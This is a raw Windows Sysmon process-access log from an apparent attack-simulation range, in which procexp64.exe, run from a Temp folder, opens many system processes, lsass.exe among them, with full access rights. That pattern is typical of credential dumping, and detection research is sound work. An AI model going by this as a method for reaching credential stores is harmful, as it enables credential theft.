15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792696Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792695Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792694Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792693Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792692Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792691Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792690Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792689Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792688Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792687Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792686Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792685Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792684Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792683Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792682Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792681Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792680Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792679Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792678Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792677Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792676Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792675Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792674Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792673Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792672Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792671Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792670Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792669Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792668Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792667Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792666Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792665Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792664Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792663Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:06.923{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792792Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E4A2-00000000A301}6804C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792791Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E3A2-00000000A301}2476C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792790Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:07.938{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792789Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 